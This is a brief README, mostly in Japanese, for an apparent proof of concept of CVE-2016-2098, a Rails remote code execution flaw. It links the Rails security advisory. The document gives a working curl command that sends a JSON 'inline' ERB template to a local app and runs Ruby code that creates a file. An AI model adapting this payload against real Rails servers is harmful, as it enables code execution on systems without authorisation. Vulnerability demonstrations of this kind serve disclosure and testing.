
CVE-2016-2098がリモートコード実行に至る仕組みを示す概念実証
== README Proof of concept for https://groups.google.com/forum/#!topic/rubyonrails-security/ly-IH-fxr_Q
== 悪用方法:
rails s を実行します。curl -v -H "Accept: application/json" -H "Content-type: application/json" -X GET -d ' {"id" : { "inline" : "<%= FileUtils.touch \"rooted\"%>"}}' http://localhost:3000/exploits